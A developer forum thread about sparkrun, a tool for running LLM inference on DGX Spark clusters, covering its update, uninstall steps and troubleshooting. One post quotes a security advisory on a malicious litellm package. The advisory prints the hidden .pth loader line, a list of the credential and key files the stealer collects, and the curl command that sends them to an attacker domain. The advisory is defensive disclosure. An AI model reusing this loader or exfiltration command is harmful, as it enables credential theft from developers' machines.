Sparkrun - central command with tab completion for launching inference on Spark Clusters

mrtime · March 24, 2026, 6:11pm

[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential stealer

opened 11:48AM - 24 Mar 26 UTC

llm translation potential-duplicate

[LITELLM TEAM] - For updates from the team, please see: https://github.com/Berri…AI/litellm/issues/24518 --- # [Security]: CRITICAL: Malicious `litellm_init.pth` in litellm 1.82.8 PyPI package — credential stealer ## Summary The `litellm==1.82.8` wheel package on PyPI contains a malicious `.pth` file (`litellm_init.pth`, 34,628 bytes) that **automatically executes a credential-stealing script every time the Python interpreter starts** — no `import litellm` required. This is a supply chain compromise. The malicious file is listed in the package's own `RECORD`: ``` litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628 ``` ## Reproduction ```bash pip download litellm==1.82.8 --no-deps -d /tmp/check python3 -c " import zipfile, os whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0] with zipfile.ZipFile(whl) as z: pth = [n for n in z.namelist() if n.endswith('.pth')] print('PTH files:', pth) for p in pth: print(z.read(p)[:300]) " ``` You will see `litellm_init.pth` containing: ```python import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"]) ``` ## Malicious Behavior (full analysis) The payload is **double base64-encoded**. When decoded, it performs the following: ### Stage 1: Information Collection The script collects sensitive data from the host system: - **System info**: `hostname`, `whoami`, `uname -a`, `ip addr`, `ip route` - **Environment variables**: `printenv` (captures all API keys, secrets, tokens) - **SSH keys**: `~/.ssh/id_rsa`, `~/.ssh/id_ed25519`, `~/.ssh/id_ecdsa`, `~/.ssh/id_dsa`, `~/.ssh/authorized_keys`, `~/.ssh/known_hosts`, `~/.ssh/config` - **Git credentials**: `~/.gitconfig`, `~/.git-credentials` - **AWS credentials**: `~/.aws/credentials`, `~/.aws/config`, IMDS token + security credentials - **Kubernetes secrets**: `~/.kube/config`, `/etc/kubernetes/admin.conf`, `/etc/kubernetes/kubelet.conf`, `/etc/kubernetes/controller-manager.conf`, `/etc/kubernetes/scheduler.conf`, service account tokens - **GCP credentials**: `~/.config/gcloud/application_default_credentials.json` - **Azure credentials**: `~/.azure/` - **Docker configs**: `~/.docker/config.json`, `/kaniko/.docker/config.json`, `/root/.docker/config.json` - **Package manager configs**: `~/.npmrc`, `~/.vault-token`, `~/.netrc`, `~/.lftprc`, `~/.msmtprc`, `~/.my.cnf`, `~/.pgpass`, `~/.mongorc.js` - **Shell history**: `~/.bash_history`, `~/.zsh_history`, `~/.sh_history`, `~/.mysql_history`, `~/.psql_history`, `~/.rediscli_history` - **Crypto wallets**: `~/.bitcoin/`, `~/.litecoin/`, `~/.dogecoin/`, `~/.zcash/`, `~/.dashcore/`, `~/.ripple/`, `~/.bitmonero/`, `~/.ethereum/keystore/`, `~/.cardano/`, `~/.config/solana/` - **SSL/TLS private keys**: `/etc/ssl/private/`, Let's Encrypt `.pem` and `.key` files - **CI/CD secrets**: `terraform.tfvars`, `.gitlab-ci.yml`, `.travis.yml`, `Jenkinsfile`, `.drone.yml`, `Anchor.toml`, `ansible.cfg` - **Database credentials**: PostgreSQL, MySQL, Redis, LDAP config files - **Webhook URLs**: grep for Slack/Discord webhook URLs in env and config files ### Stage 2: Encryption & Exfiltration 1. Collected data is written to a temporary file 2. A random 32-byte AES-256 session key is generated via `openssl rand` 3. The collected data is encrypted with `openssl enc -aes-256-cbc -pbkdf2` 4. The AES session key is encrypted with a **hardcoded 4096-bit RSA public key** via `openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep` 5. Both encrypted files are packed into `tpcp.tar.gz` 6. The archive is exfiltrated via: ```bash curl -s -o /dev/null -X POST \ "https://models.litellm.cloud/" \ -H "Content-Type: application/octet-stream" \ -H "X-Filename: tpcp.tar.gz" \ --data-binary @tpcp.tar.gz ``` ## Key Technical Details - **Trigger mechanism**: `.pth` files in `site-packages/` are executed automatically by the Python interpreter on startup (see [Python docs on .pth files](https://docs.python.org/3/library/site.html)). No `import` statement is needed. - **Stealth**: The payload is double base64-encoded, making it invisible to naive source code grep. - **Exfiltration target**: `https://models.litellm.cloud/` — note the domain `litellm.cloud` (NOT `litellm.ai`, the official domain). - **RSA public key** (first 64 chars): `MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...` ## Impact Anyone who installed `litellm==1.82.8` via pip has had **all environment variables, SSH keys, cloud credentials, and other secrets** collected and sent to an attacker-controlled server. This affects: - Local development machines - CI/CD pipelines - Docker containers - Production servers ## Affected Version - **Confirmed**: `litellm==1.82.8` (PyPI wheel `litellm-1.82.8-py3-none-any.whl`) - **Other versions**: Not yet checked — the attacker may have compromised multiple releases ## Recommended Actions 1. **PyPI**: Yank/remove litellm 1.82.8 immediately 2. **Users**: Check for `litellm_init.pth` in your `site-packages/` directory 3. **Users**: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed 4. **BerriAI**: Audit PyPI publishing credentials and CI/CD pipeline for compromise ## Environment - OS: Ubuntu 24.04 (Docker container) - Python: 3.13 - pip installed from PyPI - Discovered: 2026-03-24

dbsci · March 25, 2026, 6:17am

Very very very scary. Crazy/ironic that the source of the leaked litellm credentials is being blamed on trivy leak – which is a very commonly used security tool.

sparkrun will now pin particular versions of all dependencies to reduce risk of supply chain attacks that may affect sparkrun. Next release is coming this week and it’s a major release.

aceangel · March 26, 2026, 7:13pm

Was sparkrun affected by the liteLLM infected release?

dbsci · March 26, 2026, 8:29pm

Unfortunately, sparkrun’s version was unpinned, so it entirely depends on when you launched the proxy. There was a window of a few hours when it would’ve been at risk if you freshly launched the proxy during that window.

Next version of sparkrun pins everything and also has security against shell injection attacks in recipes.

dbsci · March 27, 2026, 1:06am

sparkrun has been updated. This is a big update (including transition to next minor version, 0.2.x).

First and foremost, this release marks the official transition of sparkrun to being part of the spark-arena organization. The git repo is now at: https://github.com/spark-arena/sparkrun to reflect sparkrun’s position as an effort for the community.

Beyond that, lots of changes:

Documentation Revamp
Spark Arena Integration (integrated login & benchmarking)
Security (work on shell injection protection for recipes; pinning all dependency versions; non-root user and non-privileged containers by default)
Fixes for cross-platform cache paths
Additional commands to enable automation and external use of sparkrun for orchestration
Addition of systemd service export
Tighter integration with eugr-vllm-docker
Intended to align with new spark-arena images for eugr vllm and llama.cpp (sglang coming soon)
Ability to configure transfer interface preferences as part of cluster configuration
Lots of bug fixes and internal architecture improvements
New setup wizard for better installation/setup experience for new users

I’ll post more shortly about how to get started with some of the new functionality.

FlossingEnthusiast · March 28, 2026, 3:42pm

@dbsci Just updated sparkrun (awesome project, thank you!), and the version was updated to 0.2.6:

dgx-spark:~$ sparkrun update
Checking for sparkrun updates (current: 0.2.3)…
sparkrun updated: 0.2.3 → 0.2.6

Updating recipe registries…
Updating 6 registries…
Updating sparkrun-testing… done
Updating sparkrun-transitional… done
Updating official… done
Updating experimental… done
Updating eugr… done
Updating community… done
6 registries updated.
dgx-spark:~$

The releases page ( Releases · spark-arena/sparkrun · GitHub ) shows 0.2.5 as being the most recent. Something I’m missing?

dbsci · March 28, 2026, 4:28pm

No. Sometimes I don’t end up listing the release as a github release. v0.2.6 was a quick fix to handle some issues that’ll come up for some edge cases. I quickly pushed out the patch and didn’t mark the release.

There is a tag, PR, and all the other things there to mark it – just not the “release” itself.

So you’re not missing anything.

FlossingEnthusiast · March 28, 2026, 4:41pm

Awesome, thank you for the explanation!

danielkrns · March 28, 2026, 9:22pm

How easy is sparkrun to uninstall and remove its changes (even after running the setup wizard)?

dbsci · March 28, 2026, 10:06pm

Why would you ever want to do that???

Well it does a bunch of stuff and it depends on how much you do in the wizard – you can also choose to say no for lots of steps if you prefer how you did it yourself – but some of the setup wizard steps are pretty much a crystallization of experience of what typically helps people who are new to the spark, so you might want those even if you don’t use sparkrun…

Anyway, it’s a fair question, so I’ve written more detailed explanation below. And FYI, because of your questions, I’ve also started on making an uninstall so that it can remove itself more thoroughly – so that’ll probably come in the next release or so.

It installs itself as a uv tool, so uv tool uninstall sparkrun to remove it.

It creates two metadata directories:
~/.config/sparkrun for configuration stuff
~/.cache/sparkrun for cache stuff

Tab autocompletion adds this to ~/.bashrc:

# sparkrun tab-completion
eval "$(_SPARKRUN_COMPLETE=bash_source sparkrun)"

so you should remove that to get rid of tab completion element.

The other changes the wizard makes are marginally more complicated to remove because it’s part of basic cluster setup and isn’t necessarily specific to sparkrun:

SSH meshing (it saves ssh keys among node members) – you can remove/reduce authorized keys list (~/.ssh/authorized_keys for cluster user) but you probably want this in your cluster.
It adds user to the docker group if it’s not already there – you probably want that.
It adds targeted sudoers entries for clearing page cache and fixing HF cache dir permissions – relatively low risk of abuse, that’s why uses very targeted sudoers entries instead of broadly giving sudo rights (EDIT: /etc/sudoers.d/sparkrun-*; always uses sparkrun- prefix on sudo rules for traceability)
CX7 configuration – it’ll either create or edit netplan config if you want to, it’ll only recommend to make changes if your setup doesn’t meet guidelines

As an alternative to the wizard, you can also install with uvx sparkrun setup install (which will do the uv tool install, the tab completion, and put initial files in the config/cache directories) – but not direct you to the wizard, and then you’ll have full control over everything else. Undoing the uv tool, tab completion, and removing the cache/config directories is a relatively straightforward and complete removal.

So it depends why you’re asking – but I’ve taken care to try to keep the footprint relatively minimal (e.g. targeted sudoers entries and not blanket sudo access). The other points are essentially just applying best practices and support, but outside of the initial installation, everything in the wizard is technically optional but then you’re responsible for setting it up.

danielkrns · March 28, 2026, 11:14pm

It’s partially my own paranoia but I am thinking back to my experience with other frameworks like Conda. Where you can find creative way of messing up installation like running the setup wizard twice, or having something in the configuration change after an update to the machine or framework.

In my experience small changes sneak up on you. So I care about understanding them.

dbsci · March 28, 2026, 11:20pm

Totally fair. I started with “why would you want to…” in a light joking way :-)

Also you can run the setup wizard multiple times here – it’s meant to guide you through stuff and generally its changes are idempotent – like there is no harm in trying to add yourself to docker group 50x – you’ll only end up added 1x.

Edit: in fact, I would recommend people run the wizard again if they were adding more nodes or stuff like that – because it automates the process – and any steps that are “redundant” to do, are performed in an idempotent way such that there is no harm in running it again.

(And I am adding uninstall since you brought it up as well – the wizard will keep track of what it’s done and then you’ll be able to uninstall against that record.)

sparkrun’s core functionality tries to stay contained to its metadata and cache directories basically, but because it’s an orchestration tool, it does have to touch other things as part of setup. Once setup (either manually or via the wizard), it basically keeps to itself. You could essentially “factory reset” sparkrun by deleting the cache and metadata directories.

danielkrns · March 29, 2026, 12:00am

Unrelated, but for some reason the site “sparkrun.dev” is blocked by my DNS provider. It seems Bezeq BCyber blacklisted your site for some reason 🤷‍♂️, can still get to it with other DNSs though.

dbsci · March 29, 2026, 12:32am

That’s really weird… I can’t really imagine why… glad you can get to it otherwise because I have a lot more docs on the site – github has README and a few things but most docs are on the website.

AoE · March 29, 2026, 7:50am

I’ve had this in the past because of the rule which blocks newly registered domains.

danielkrns · April 6, 2026, 10:46pm

Hi, I’m running sparkrun and hitting a build failure during the Docker image build step. The apt install seem to fail because several package versions aren’t available on ports.ubuntu.com

The build downloads 457 MB successfully but then fails with:

E: Failed to fetch http://ports.ubuntu.com/.../python3-wheel_0.42.0-2_all.deb
E: Failed to fetch http://ports.ubuntu.com/.../python3-pip_24.0+dfsg-1ubuntu1.3_all.deb
E: Failed to fetch http://ports.ubuntu.com/.../vim_9.1.0016-1ubuntu7.10_arm64.deb
E: Failed to fetch http://ports.ubuntu.com/.../libibverbs-dev_50.0-2ubuntu0.2_arm64.deb

The host machine can reach ports.ubuntu.com The packages just don’t appear to exist at those exact versions for ARM64 on my Ubuntu release.

Error: RuntimeError: eugr container build failed (exit 1)

Is this a known issue? Is there a workaround?

I used “sparkrun run @eugr/gemma4-26b-a4b” but it happens with any recipie with @eugr

dbsci · April 6, 2026, 10:56pm

I haven’t come across that. The problem is related to the build step and specific to building the spark-vllm-docker image.

One thing you can try as an alternative is to use:

sparkrun run @eugr/gemma4-26b-a4b --image "ghcr.io/spark-arena/dgx-vllm-eugr-nightly-tf5:20260406"

The --image is overriding the image in the recipe to a fixed/specific recipe version. The Spark Arena dgx-vllm-eugr images are built to stay up-to-date with the current spark-vllm-docker. Typically building the images locally is the faster way to get the latest version; however, that’s obviously not the case if it’s not working for you at all. This way should hopefully bypass that – and let you download built image from our github container registry.

danielkrns · April 6, 2026, 10:58pm

also i updated sparkrun and now the recipies that worked fail for me

sparkrun run @sparkrun-transitionalsparkrun-transitional/qwen3.5-35b-a3b-fp8-sglang
sparkrun v0.2.20



Runtime:   sglang
Image:     scitrera/dgx-spark-sglang:0.5.9-dev1-329817e2-t5
Model:     Qwen/Qwen3.5-35B-A3B-FP8
Mode:      solo
Warning: You are sending unauthenticated requests to the HF Hub. Please set a HF_TOKEN to enable higher rate limits and faster downloads.
Warning: You are sending unauthenticated requests to the HF Hub. Please set a HF_TOKEN to enable higher rate limits and faster downloads.

VRAM Estimation:
Model dtype:      fp8
Model params:     35,953,925,552
KV cache dtype:   bfloat16
Architecture:     40 layers, 2 KV heads, 256 head_dim
Model weights:    33.48 GB
KV cache:         20.00 GB (max_model_len=262,144)
Tensor parallel:  1
Per-GPU total:    53.48 GB
DGX Spark fit:    YES

GPU Memory Budget:
gpu_memory_utilization: 80%
Usable GPU memory:     96.8 GB (121 GB x 80%)
Available for KV:      63.3 GB
Max context tokens:    829,886
Context multiplier:    3.2x (vs max_model_len=262,144)

Hosts:     default cluster ‘mylab’
Target:  127.0.0.1

[1/6] Preparing
done (0.0s)
[2/6] Building image — skipped (no builder)
[3/6] Distributing resources
SSH script ← 127.0.0.1 FAILED rc=255 (0.1s): dalsp@127.0.0.1: Permission denied (publickey,password).
Checking container image on 1 host(s)
SSH cmd ← 127.0.0.1 FAILED rc=255 (0.1s): dalsp@127.0.0.1: Permission denied (publickey,password).
SSH script ← 127.0.0.1 FAILED rc=255 (0.1s): dalsp@127.0.0.1: Permission denied (publickey,password).
Failed to ensure Image 'scitrera/dgx-spark-sglang:0.5.9-d

I get this with what you suggested too now

I think I managed to break your program :P

dbsci · April 6, 2026, 11:00pm

Is your OS username different than the “cluster” username? If so, you should rerun sparkrun setup ssh to enable SSH to self. I know that sounds ridiculous, but basically you need to authenticate if the username is different.

danielkrns · April 6, 2026, 11:08pm

I’ll keep you posted, but I think I might have figured it out, if i create another cluster with the setup wizard it seems to run. The previous profile probably got messed up during the update, perhaps using “uv tool update” wasn’t the best idea.

Topic		Replies	Views
Spark: one script CLI for setup, remote access, and LLM serving on DGX Spark DGX Spark / GB10 Projects cuda , docker , spark , llm , deepseek	3	247	May 21, 2026
Managing Local LLM Orchestration DGX Spark / GB10 Projects	12	2119	April 23, 2026
HOW-TO: setup-dgx-spark docker inference - A "Sane" Inference Stack for GB10 (Need Contributors!) DGX Spark / GB10 Projects docker , llama , dgx	38	2317	April 28, 2026
Spark-inference: Run 3 specialized models simultaneously on your DGX Spark — cybersecurity + coding + orchestration, 30-min setup DGX Spark / GB10 Projects jetson , llama , deepseek , nemotron	3	887	May 11, 2026
How to use eugr's docker? DGX Spark / GB10	10	571	April 8, 2026
New pre-built vLLM Docker Images for NVIDIA DGX Spark DGX Spark / GB10	74	8368	March 27, 2026
Introducing the Spark Arena DGX Spark / GB10	129	7268	April 24, 2026
HOW-TO: Run Qwen3-Coder-Next on Spark DGX Spark / GB10 llama	92	9571	March 24, 2026
SparkD: The missing dashboard for spark-vllm-docker DGX Spark / GB10	4	350	April 27, 2026
DGX Spark + Qwen3-Next-80B: Proven Performance, But Missing Clear Path to NIM, TensorRT-LLM & Web UIs DGX Spark / GB10 cuda , nim , llama	16	4377	March 6, 2026

Sparkrun - central command with tab completion for launching inference on Spark Clusters

Related topics